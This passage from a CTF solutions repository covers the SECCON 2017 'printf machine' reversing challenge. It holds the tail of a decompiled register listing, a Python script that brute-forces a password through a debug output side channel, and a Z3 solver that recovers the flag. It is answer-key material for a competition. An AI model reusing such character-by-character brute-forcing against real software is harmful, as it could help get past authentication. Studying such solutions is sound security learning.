r[8] + r[8] 3423 | r[3] = r[3] + r[8] 3424 | r[8] = r[8] + r[8] 3425 | r[3] = r[3] + r[8] 3426 | r[8] = r[8] + r[8] 3427 | r[8] = r[8] + r[8] 3428 | r[3] = r[3] + r[8] 3429 | r[8] = r[8] + r[8] 3430 | r[2] = r[2] + r[3] 3431 | r[3] = 0 3432 | r[8] = i[1] 3433 | r[3] = r[3] + r[8] 3434 | r[8] = r[8] + r[8] 3435 | r[8] = r[8] + r[8] 3436 | r[8] = r[8] + r[8] 3437 | r[3] = r[3] + r[8] 3438 | r[8] = r[8] + r[8] 3439 | r[3] = r[3] + r[8] 3440 | r[8] = r[8] + r[8] 3441 | r[3] = r[3] + r[8] 3442 | r[8] = r[8] + r[8] 3443 | r[8] = r[8] + r[8] 3444 | r[3] = r[3] + r[8] 3445 | r[8] = r[8] + r[8] 3446 | r[2] = r[2] + r[3] 3447 | r[3] = 0 3448 | r[8] = i[2] 3449 | r[8] = r[8] + r[8] 3450 | r[3] = r[3] + r[8] 3451 | r[8] = r[8] + r[8] 3452 | r[3] = r[3] + r[8] 3453 | r[8] = r[8] + r[8] 3454 | r[8] = r[8] + r[8] 3455 | r[8] = r[8] + r[8] 3456 | r[3] = r[3] + r[8] 3457 | r[8] = r[8] + r[8] 3458 | r[2] = r[2] + r[3] 3459 | r[3] = 0 3460 | r[8] = i[3] 3461 | r[3] = r[3] + r[8] 3462 | r[8] = r[8] + r[8] 3463 | r[3] = r[3] + r[8] 3464 | r[8] = r[8] + r[8] 3465 | r[8] = r[8] + r[8] 3466 | r[3] = r[3] + r[8] 3467 | r[8] = r[8] + r[8] 3468 | r[8] = r[8] + r[8] 3469 | r[8] = r[8] + r[8] 3470 | r[3] = r[3] + r[8] 3471 | r[8] = r[8] + r[8] 3472 | r[2] = r[2] + r[3] 3473 | r[3] = 0 3474 | r[8] = i[4] 3475 | r[3] = r[3] + r[8] 3476 | r[8] = r[8] + r[8] 3477 | r[3] = r[3] + r[8] 3478 | r[8] = r[8] + r[8] 3479 | r[8] = r[8] + r[8] 3480 | r[8] = r[8] + r[8] 3481 | r[3] = r[3] + r[8] 3482 | r[8] = r[8] + r[8] 3483 | r[3] = r[3] + r[8] 3484 | r[8] = r[8] + r[8] 3485 | r[3] = r[3] + r[8] 3486 | r[8] = r[8] + r[8] 3487 | r[2] = r[2] + r[3] 3488 | r[3] = 0 3489 | r[8] = i[5] 3490 | r[8] = r[8] + r[8] 3491 | r[8] = r[8] + r[8] 3492 | r[8] = r[8] + r[8] 3493 | r[8] = r[8] + r[8] 3494 | r[3] = r[3] + r[8] 3495 | r[8] = r[8] + r[8] 3496 | r[3] = r[3] + r[8] 3497 | r[8] = r[8] + r[8] 3498 | r[3] = r[3] + r[8] 3499 | r[8] = r[8] + r[8] 3500 | r[2] = r[2] + r[3] 3501 | r[3] = 0 3502 | r[8] = i[6] 3503 | r[8] = r[8] + r[8] 3504 | r[8] = r[8] + r[8] 3505 | r[8] = r[8] + r[8] 3506 | r[8] = r[8] + r[8] 3507 | r[8] = r[8] + r[8] 3508 | r[3] = r[3] + r[8] 3509 | r[8] = r[8] + r[8] 3510 | r[8] = r[8] + r[8] 3511 | r[3] = r[3] + r[8] 3512 | r[8] = r[8] + r[8] 3513 | r[2] = r[2] + r[3] 3514 | r[3] = 0 3515 | r[8] = i[7] 3516 | r[3] = r[3] + r[8] 3517 | r[8] = r[8] + r[8] 3518 | r[8] = r[8] + r[8] 3519 | r[8] = r[8] + r[8] 3520 | r[8] = r[8] + r[8] 3521 | r[8] = r[8] + r[8] 3522 | r[3] = r[3] + r[8] 3523 | r[8] = r[8] + r[8] 3524 | r[8] = r[8] + r[8] 3525 | r[3] = r[3] + r[8] 3526 | r[8] = r[8] + r[8] 3527 | r[2] = r[2] + r[3] 3528 | r[3] = 0 3529 | r[8] = i[8] 3530 | r[8] = r[8] + r[8] 3531 | r[3] = r[3] + r[8] 3532 | r[8] = r[8] + r[8] 3533 | r[8] = r[8] + r[8] 3534 | r[8] = r[8] + r[8] 3535 | r[3] = r[3] + r[8] 3536 | r[8] = r[8] + r[8] 3537 | r[3] = r[3] + r[8] 3538 | r[8] = r[8] + r[8] 3539 | r[8] = r[8] + r[8] 3540 | r[3] = r[3] + r[8] 3541 | r[8] = r[8] + r[8] 3542 | r[2] = r[2] + r[3] 3543 | r[3] = 0 3544 | r[8] = i[9] 3545 | r[8] = r[8] + r[8] 3546 | r[3] = r[3] + r[8] 3547 | r[8] = r[8] + r[8] 3548 | r[3] = r[3] + r[8] 3549 | r[8] = r[8] + r[8] 3550 | r[3] = r[3] + r[8] 3551 | r[8] = r[8] + r[8] 3552 | r[8] = r[8] + r[8] 3553 | r[3] = r[3] + r[8] 3554 | r[8] = r[8] + r[8] 3555 | r[2] = r[2] + r[3] 3556 | r[3] = 0 3557 | r[8] = i[10] 3558 | r[8] = r[8] + r[8] 3559 | r[3] = r[3] + r[8] 3560 | r[8] = r[8] + r[8] 3561 | r[8] = r[8] + r[8] 3562 | r[3] = r[3] + r[8] 3563 | r[8] = r[8] + r[8] 3564 | r[3] = r[3] + r[8] 3565 | r[8] = r[8] + r[8] 3566 | r[8] = r[8] + r[8] 3567 | r[3] = r[3] + r[8] 3568 | r[8] = r[8] + r[8] 3569 | r[3] = r[3] + r[8] 3570 | r[8] = r[8] + r[8] 3571 | r[2] = r[2] + r[3] 3572 | r[3] = 0 3573 | r[8] = i[11] 3574 | r[3] = r[3] + r[8] 3575 | r[8] = r[8] + r[8] 3576 | r[3] = r[3] + r[8] 3577 | r[8] = r[8] + r[8] 3578 | r[3] = r[3] + r[8] 3579 | r[8] = r[8] + r[8] 3580 | r[3] = r[3] + r[8] 3581 | r[8] = r[8] + r[8] 3582 | r[8] = r[8] + r[8] 3583 | r[3] = r[3] + r[8] 3584 | r[8] = r[8] + r[8] 3585 | r[3] = r[3] + r[8] 3586 | r[8] = r[8] + r[8] 3587 | r[3] = r[3] + r[8] 3588 | r[8] = r[8] + r[8] 3589 | r[2] = r[2] + r[3] 3590 | r[3] = 0 3591 | r[8] = i[12] 3592 | r[8] = r[8] + r[8] 3593 | r[8] = r[8] + r[8] 3594 | r[8] = r[8] + r[8] 3595 | r[8] = r[8] + r[8] 3596 | r[8] = r[8] + r[8] 3597 | r[3] = r[3] + r[8] 3598 | r[8] = r[8] + r[8] 3599 | r[8] = r[8] + r[8] 3600 | r[3] = r[3] + r[8] 3601 | r[8] = r[8] + r[8] 3602 | r[2] = r[2] + r[3] 3603 | r[3] = 0 3604 | r[8] = i[13] 3605 | r[8] = r[8] + r[8] 3606 | r[3] = r[3] + r[8] 3607 | r[8] = r[8] + r[8] 3608 | r[3] = r[3] + r[8] 3609 | r[8] = r[8] + r[8] 3610 | r[3] = r[3] + r[8] 3611 | r[8] = r[8] + r[8] 3612 | r[3] = r[3] + r[8] 3613 | r[8] = r[8] + r[8] 3614 | r[3] = r[3] + r[8] 3615 | r[8] = r[8] + r[8] 3616 | r[3] = r[3] + r[8] 3617 | r[8] = r[8] + r[8] 3618 | r[3] = r[3] + r[8] 3619 | r[8] = r[8] + r[8] 3620 | r[2] = r[2] + r[3] 3621 | r[3] = 0 3622 | r[8] = i[14] 3623 | r[3] = r[3] + r[8] 3624 | r[8] = r[8] + r[8] 3625 | r[3] = r[3] + r[8] 3626 | r[8] = r[8] + r[8] 3627 | r[8] = r[8] + r[8] 3628 | r[3] = r[3] + r[8] 3629 | r[8] = r[8] + r[8] 3630 | r[3] = r[3] + r[8] 3631 | r[8] = r[8] + r[8] 3632 | r[3] = r[3] + r[8] 3633 | r[8] = r[8] + r[8] 3634 | r[2] = r[2] + r[3] 3635 | r[3] = 0 3636 | r[8] = i[15] 3637 | r[3] = r[3] + r[8] 3638 | r[8] = r[8] + r[8] 3639 | r[8] = r[8] + r[8] 3640 | r[8] = r[8] + r[8] 3641 | r[3] = r[3] + r[8] 3642 | r[8] = r[8] + r[8] 3643 | r[8] = r[8] + r[8] 3644 | r[8] = r[8] + r[8] 3645 | r[8] = r[8] + r[8] 3646 | r[3] = r[3] + r[8] 3647 | r[8] = r[8] + r[8] 3648 | r[2] = r[2] + r[3] 3649 | r[0] = r[2] + 80 3650 | r[4] = len(&r[0]) 3651 | r[15] = r[15] + r[4] -------------------------------------------------------------------------------- /seccon2017/printfmachine/printf_machine-05943cfba938e4ab7f52f096e35f6197c9308a6c56c83d75812adebe21671f9a.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ret2libc/ctfs/6ead9375ec34a7684aca97f1de7d609296e7595a/seccon2017/printfmachine/printf_machine-05943cfba938e4ab7f52f096e35f6197c9308a6c56c83d75812adebe21671f9a.zip -------------------------------------------------------------------------------- /seccon2017/printfmachine/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys 4 | import re 5 | import itertools 6 | import string 7 | import subprocess 8 | import argparse 9 | import logging 10 | 11 | def do(exec_file, check_output, max_length = 20, choices = string.lowercase + string.uppercase + string.punctuation + string.digits): 12 | n_try = 0 13 | password = '=FX' 14 | lenp= len(password) 15 | for i in range(0xf): 16 | min_v = 1000 17 | min_ch = {} 18 | for ch in choices: 19 | flag = password + ch + '\n' 20 | # print 'trying ' + flag 21 | p = subprocess.Popen([exec_file, 'debug.fs'], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) 22 | p.stdin.write(flag) 23 | (out, err) = p.communicate() 24 | #print out,err 25 | val = check_output(err, i) 26 | if val is not None and val <= min_v: 27 | min_v = val 28 | if min_v not in min_ch: 29 | min_ch[min_v] = [] 30 | min_ch[min_v].append(ch) 31 | 32 | min_key = min(min_ch.keys()) 33 | password = password + min_ch[min_key][-1] 34 | print 'min_v = ' + str(min_key) + ', min_ch = ' + str(min_ch[min_key]) + ', psw = ' + password 35 | 36 | if len(password) < 16: 37 | return None 38 | 39 | #n_try += 1 40 | #if n_try % 153 == 0: 41 | # logging.debug('Try #%d. Last password = %s' % (n_try, password)) 42 | return password 43 | 44 | 45 | def check_output(out, i): 46 | for l in out.split('\n'): 47 | if 'DBG' in l: 48 | lendbg = len('DBG CHAR: "') 49 | 50 | l = l[lendbg:] 51 | l = l[:l.index('"')] 52 | ch = int(l, 16) 53 | return ch 54 | 55 | return None 56 | 57 | if __name__ == '__main__': 58 | parser = argparse.ArgumentParser(description='Bruteforce stdin') 59 | parser.add_argument('input_bin', help='Program to bruteforce') 60 | parser.add_argument('--length', help='Max length of the string to try') 61 | parser.add_argument('--debug', action='store_true', help='Enable debugging printing') 62 | args = parser.parse_args() 63 | 64 | if args.debug: 65 | logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) 66 | 67 | if args.length: 68 | result = do(args.input_bin, check_output, max_length = args.length) 69 | else: 70 | result = do(args.input_bin, check_output) 71 | 72 | if result is None: 73 | print "I'm sorry, I wasn't able to find the correct value" 74 | else: 75 | print "The good value is: %s" % result 76 | -------------------------------------------------------------------------------- /seccon2017/printfmachine/solve_z3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | from z3 import * 4 | 5 | s = Solver() 6 | 7 | res = [] 8 | res.append(([220, 14, 22, 235, 183, 129, 245, 145, 25, 113, 235, 35, 246, 240, 93, 107], 146)) 9 | res.append(([0, 152, 34, 136, 253, 131, 123, 165, 232, 231, 182, 18, 220, 171, 69, 75], 141)) 10 | res.append(([43, 219, 165, 225, 193, 11, 248, 28, 86, 5, 198, 56, 212, 218, 18, 154], 161)) 11 | res.append(([8, 79, 96, 233, 169, 183, 226, 188, 205, 20, 56, 119, 110, 52, 233, 146], 112)) 12 | res.append(([197, 241, 177, 75, 107, 76, 68, 208, 102, 110, 26, 83, 17, 26, 57, 63], 164)) 13 | res.append(([205, 148, 209, 248, 18, 142, 67, 53, 80, 174, 123, 194, 201, 223, 84, 47], 50)) 14 | res.append(([68, 120, 89, 96, 153, 29, 37, 218, 101, 117, 248, 65, 140, 43, 239, 106], 51)) 15 | res.append(([14, 218, 92, 251, 91, 29, 155, 16, 31, 1, 118, 214, 220, 174, 159, 70], 145)) 16 | res.append(([196, 24, 230, 117, 133, 191, 90, 84, 61, 82, 19, 216, 93, 95, 128, 161], 23)) 17 | res.append(([80, 23, 133, 17, 58, 134, 204, 222, 245, 66, 223, 96, 153, 76, 189, 4], 90)) 18 | res.append(([96, 116, 110, 226, 57, 112, 132, 185, 234, 30, 167, 5, 171, 222, 137, 54], 215)) 19 | res.append(([68, 71, 197, 155, 88, 188, 220, 8, 22, 42, 188, 64, 23, 27, 64, 204], 196)) 20 | res.append(([95, 144, 238, 1, 67, 18, 231, 29, 18, 243, 250, 119, 66, 56, 12, 110], 236)) 21 | res.append(([188, 219, 205, 136, 205, 232, 25, 192, 72, 94, 148, 141, 59, 0, 195, 98], 33)) 22 | res.append(([107, 196, 112, 47, 237, 172, 223, 90, 242, 207, 163, 117, 162, 128, 50, 139], 9)) 23 | res.append(([44, 185, 38, 75, 115, 112, 160, 161, 178, 46, 218, 239, 160, 254, 59, 137], 176)) 24 | 25 | flag = [0] * 16 26 | for i in range(16): 27 | flag[i] = BitVec('flag%d' % (i,), 8) 28 | 29 | for l, out in res: 30 | s.add(l[0] * flag[0] + l[1] * flag[1] + l[2] * flag[2] + l[3] * flag[3] + l[4] * flag[4] + l[5] * flag[5] + l[6] * flag[6] + l[7] * flag[7] + l[8] * flag[8] + l[9] * flag[9] + l[10] * flag[10] + l[11] * flag[11] + l[12] * flag[12] + l[13] * flag[13] + l[14] * flag[14] + l[15] * flag[15] == out) 31 | 32 | 33 | def swap(l, i, j): 34 | tmp = l[i] 35 | l[i] = l[j] 36 | l[j] = tmp 37 | 38 | print s 39 | if s.check(): 40 | l = [] 41 | for i in range(16): 42 | v = int(str(s.model()[flag[i]])) 43 | l.append(v) 44 | 45 | swap(l, 14, 15) 46 | swap(l, 13, 15) 47 | swap(l, 12, 14) 48 | swap(l, 10,15) 49 | swap(l, 9,14) 50 | swap(l, 15,7) 51 | swap(l, 6, 14) 52 | swap(l, 5, 10) 53 | swap(l, 2,10) 54 | swap(l, 1,7) 55 | swap(l, 0, 13) 56 | print ''.join(map(chr, l)) 57 | else: 58 | print 'Failure' 59 | --------------------------------------------------------------------------------